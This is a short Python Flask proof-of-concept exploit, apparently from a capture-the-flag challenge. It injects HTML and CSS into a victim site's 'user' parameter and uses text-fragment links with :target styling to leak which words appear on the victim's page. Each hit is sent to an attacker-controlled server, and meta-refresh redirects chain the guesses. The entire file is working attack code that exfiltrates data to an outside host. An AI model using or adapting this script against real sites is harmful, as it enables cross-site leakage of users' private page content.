poc3_exploit.py

from flask import Flask
from flask import request
import sys

app = Flask(__name__)

VICTIM = "http://victim:5000"
ATTACKER = "http://attacker:1337"

fruits_all = ["Apple","Apricot","Avocado","Banana","Bilberry","Blackberry","Blackcurrant","Blueberry","Boysenberry","Currant","Cherry","Cherimoya"]

def gen_redirect(try_fruit):
    return f"""<script>
    let injection = `
    <style>:target::before {{ content : url({ATTACKER}/receive/{try_fruit}) }}</style>
    <div id="cookie-bar">
        <a href="#:~:text={try_fruit}" class="cb-disable"></a>
    </div>
    <meta http-equiv="refresh" content="1;URL='{ATTACKER}/redirect'">`.replaceAll('\\n', ' ');
    location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}`;
</script>
    """

i = 0
extracted_fruits = []

@app.route('/redirect')
def redirect():
    global i
    i+=1
    return gen_redirect(fruits_all[i-1]) if i <= len(fruits_all) else "Thank you for cooperation"

@app.route('/')
def solve():
    return f"""Check this out!<script>
    onclick = () => {{
        let injection = `<meta http-equiv="refresh" content="0;URL='{ATTACKER}/redirect'">`;
        let url = `{VICTIM}/?user=`;
        location = url + encodeURIComponent(injection);
    }}
</script>
    """

@app.route('/receive/<word>')
def receiver(word):
    global extracted_fruits
    extracted_fruits.append(word)
    print("Stolen: ", extracted_fruits, flush=True, file=sys.stdout)
    return "ok"